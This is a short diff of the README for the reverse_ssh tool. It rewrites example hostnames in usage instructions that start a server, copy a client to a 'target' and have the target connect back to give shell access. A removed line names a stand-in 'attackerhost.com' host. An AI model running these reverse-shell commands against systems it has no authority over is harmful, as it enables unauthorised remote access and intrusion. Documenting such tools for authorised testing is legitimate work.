NHAS/reverse_ssh/README.md

 ./server 0.0.0.0:3232

 # copy client to your target then connect to the server
-./client attackerhost.com:3232
+./client your.rssh.server.com:3232

 # Get help text
-ssh localhost -p 3232 help
+ssh your.rssh.server.com -p 3232 help

 # See clients
-ssh localhost -p 3232 ls -t
+ssh your.rssh.server.com -p 3232 ls -t

                                 Targets
 +------------------------------------------+------------+-------------+